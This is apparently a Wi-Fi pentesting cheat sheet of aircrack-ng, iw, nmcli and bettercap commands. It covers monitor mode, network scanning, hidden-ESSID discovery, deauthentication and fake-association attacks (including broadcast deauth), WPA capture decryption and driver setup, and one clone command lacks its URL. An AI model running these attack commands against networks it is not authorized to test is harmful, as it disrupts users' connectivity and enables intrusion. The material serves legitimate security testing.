Generic commands

iw list

Monitor mode

Ask NetworkManager to not manage your interface

nmcli dev set <interface> managed no

Start Monitor mode

ifconfig <wlan1> down
iwconfig <wlan1> mode monitor
ifconfig <wlan1> up
If possible, do not perform the airmon-ng check kill command.
airmon-ng check <wlan1>
airmon-ng check kill
airmon-ng start <wlan1> <channel>
airmon-ng start <wlan1> --band <abg>

Stop monitor mode

ifconfig <wlan1> down
iwconfig <wlan1> mode managed
ifconfig <wlan1> up
airmon-ng stop <wlan1mon>
service network-manager start


airodump-ng <wlan1mon>
airodump-ng <wlan1mon> -c <channel> --bssid <bssid> [-a] -w <out>
nmcli -c yes dev wifi list --rescan yes
iw dev <wlan1> scan


Uncovering hidden ESSIDs

Passive way

Check for probe requests from airodump or via wireshark by filtering all non-beacon packets.

wlan.bssid == <ap_mac> && !(wlan.fc.type_subtype == 0x08)

Active way

Deautentication attack to force the reauthentication.

aireplay-ng -0 5 -a <supplicant_mac> --ignore-negative <wlan1mon>


One packet for association

aireplay-ng -1 0 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>

Association with keep-alive

aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID> -a <ap_mac> -h <chipset_mac> <wlan1mon>


aireplay-ng -0 <nb_deauth> -a <ap_mac> -c <supplicant_mac> <wlan1mon>

Deauthenticate with broadcast address

aireplay-ng -0 20 -a <ap_mac> -c FF:FF:FF:FF:FF:FF <wlan1mon>

Decrypt capture files

For WPA/WPA2 encryption, at least handshake packets 2-3 or 3-4 are necessary.

airdecap-ng -e <essid> -p <PSK> [-b <ap_mac>] <cap_file>


airtun-ng -a <ap_mac_source> --repeat [--bssid <ap_mac_source_filtering>] -i <mon0_source> <mon1_dest>

Install the Alfa AWUS1900 (RTL8814AU) driver in Kali

RTL8814AU chipset is no longer supported in the realtek-rtl88xxau-dkms driver

apt remove realtek-rtl88xxau-dkms
apt install dkms build-essential libelf-dev linux-headers-`uname -r`
cd /opt
git clone
cd rtl8814au
make dkms_install

To remove the drivre use the command below:

make dkms_remove


Download the zip
apt install golang libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev
/opt/bettercap -eval "caplets.update; q"
/opt/bettercap -eval "caplets.update; ui.update; q"
Start GUI
/opt/bettercap -caplet "http-ui"